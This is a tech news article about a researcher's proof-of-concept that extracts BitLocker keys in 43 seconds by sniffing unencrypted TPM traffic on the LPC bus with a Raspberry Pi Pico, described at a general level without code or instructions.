What just happened? Bitlocker encryption in Windows OS improves data security by protecting system files and personal data using the AES encryption algorithm. It’s an important measure for people who need additional security, enabling PC users to safely encrypt and protect data from potential attackers. However, new research shows that it can be easily cracked using inexpensive, off-the-shelf hardware.
In a YouTube video, security researcher Stacksmashing demonstrated that hackers can extract the BitLocker encryption key from Windows PCs in just 43 seconds using a $4 Raspberry Pi Pico. According to the researcher, targeted attacks can bypass BitLocker’s encryption by directly accessing the hardware and extracting the encryption keys stored in the computer’s Trusted Platform Module (TPM) via the LPC bus.
The attack was possible due to a design flaw found in devices with dedicated TPMs, like modern laptops and desktops. As explained by the researcher, BitLocker sometimes uses external TPMs to store key information, such as the Platform Configuration Registers and Volume Master Key. However, as it turns out, the communication lanes (LPC bus) between the CPU and external TPM remain unencrypted on boot-up, allowing threat actors to sniff any traffic between the two modules and extract the encryption keys.
To carry out his proof-of-concept attack, Stacksmashing used a ten-year-old laptop with BitLocker encryption and then programmed the Raspberry Pi Pico to read the raw binary codes from the TPM to gain access to the Volume Master Key. Thereafter, he used Dislocker with the recently-acquired Volume Master Key to decrypt the drive.
It is worth noting here that this is not the first time we’re hearing about somebody bypassing BitLocker encryption. Last year, cybersecurity researcher Guillaume Quéré demonstrated how the BitLocker full volume encryption system can allow users to eavesdrop on any traffic between the discrete TPM chip and CPU via an SPI bus. However, Microsoft claimed that defeating BitLocker encryption is a long and cumbersome process that requires lengthy access to the hardware.
The latest development has now shown that BitLocker can be bypassed much more easily than previously thought, and raises pertinent questions about existing encryption methodologies. It remains to be seen whether Microsoft will root out this particular vulnerability from BitLocker, but in the long run, cybersecurity researchers need to do a better job of identifying and fixing potential security loopholes before they become a problem for users.